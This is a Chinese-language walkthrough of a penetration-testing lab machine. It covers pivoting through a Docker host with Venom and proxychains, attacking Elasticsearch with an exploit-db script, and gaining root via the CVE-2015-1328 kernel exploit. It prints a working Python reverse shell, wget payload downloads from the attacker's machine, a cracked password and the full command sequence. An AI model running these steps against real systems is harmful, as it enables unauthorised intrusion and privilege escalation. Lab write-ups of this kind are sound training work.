1.无法扫到ip地址
解决方法:设置全局nat
2.无法反弹shell
解决方法:换成/bin/sh
或者直接用python反弹shell代码:
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((“192.168.168.13”,4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([“/bin/sh”,“-i”]);
3.判断是否为docker容器:
①查看根下文件:/.dockerenv
②查看proc目录下文件:cat /proc/1/cgroup
4.内网穿透代理
①首先使用内网工具Venom :在内网和kali之间建立一条隧道,基于隧道生成一个代理,
基于代理让工具扫描内网
②先把隧道的客户端程序传输拷贝到目标系统上,然后再通过在kali上的服务端程序在两
者间建立一条隧道
1.kali 本机上运行admin_linux_x64 侦听端口9999 等待目标建立连接
./admin_linux_x64 -lport 9999
2.开启kali本机的http服务
python3 -m http.server 80
3.在靶机上用wget来访问kali上的程序下载agent_liunx_x64
wget http://10.0.2.4(kali本机地址)/agent_liunx_x64
4.赋予下载下来的文件权限
chmod+x agent_liunx_x64
5.用靶机上面下载文件访问kali本机
./a -rhost 10.0.2.4 -rport 9999
6.本机上在venom下show命令查看节点然后连接节点
show
goto1
7.在kali上的socks上启动侦听端口
socks 1080
③为了让kali上面的所有工具都可以用来扫描,用proxychains挂载在socks代理上
1.sudo vi /etc/proxychains4.conf 将代理类型改为socks5文件末尾的端口改为1080
④开始扫描目标地址上存活的其他主机
1.proxychains nmap -sT -Pn 172.17.0.1 URI 端口扫描中最稳定的,利用的是TCP三次握手
2.查看目标端口的服务信息proxychains nmap -p22,5000 -sT -sV -Pn 172.17.0.1
3.火狐浏览器内设置socks代理 127.0.0.1 端口1080
4.kali浏览器访问靶机内网地址发现留言板内容一致,说明该主机是镜像的宿主机,面向容器
内网的IP地址,172,17.0.1即为要攻击的靶机
5.对172.17.0.2 发现只开放9200端口 意识到Elasticsearch开放在9200端口上
proxychains nmap -sT -Pn 172.17.0.2
proxychains nmap -p9200 -sV-sT -Pn 172.17.0.1
⑥用searchsploit搜索Elasticsearch然后尝试利用远程代码执行漏洞攻击
1.cp /usr/share/exploitdb/exploits/linux/remote/36337.py . ------复制代码到根目录下
2.使用脚本开始攻击 ------ proxychains python2 36337.py 172.17.0.2
出现id敲击无法获取到root权限问题,解决方法:插入
proxychains curl -XPOST ‘172.17.0.2:9200/twittter/user/yren’ -d ‘{“name”:“Wu”}’
原因:因为Elasticsearch中需要先有数据才能被攻击
3.id发现为root权限,ls查看passwords挨个登录发现john的密码hack1337可以登录
⑦ssh登录john ----ssh john@10.0.2.5 准备进行提权操作
1.uname -a 发现版本为3.13 然后searchsploit linux3.13 拷贝脚本37292.c到根目录
cp /usr/share/exploitdb/exploits/linux/local/37292.c .
2.目标靶机上没有gcc 所以在本机编译后再传过去 修改掉需要编译的部分
从fprintf(stderr)到write (fd)
3.开始编译 gcc -o exp 37392.c – 把37392.c这个文件改变为exp
4.发现存在locate ofs-lib.so 然后拷贝过来
cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .
5.继续开启http服务 靶机上下载下来exp文件
python3 -m http.server 80
wget http://10.0.2.4/Desktop/‘Venom v1.1.0’/exp
wget http://10.0.2.4/Desktop/‘Venom v1.1.0’/ofs-lib.so
6.将所有文件存放到/tmp目录下,因为只有/tmp目录下有可执行和阅读的权限
cp * /tmp/
cd /tmp/
chmod +x ./exp
./exp运行
7.输入id发现已经得到root权限,打靶完毕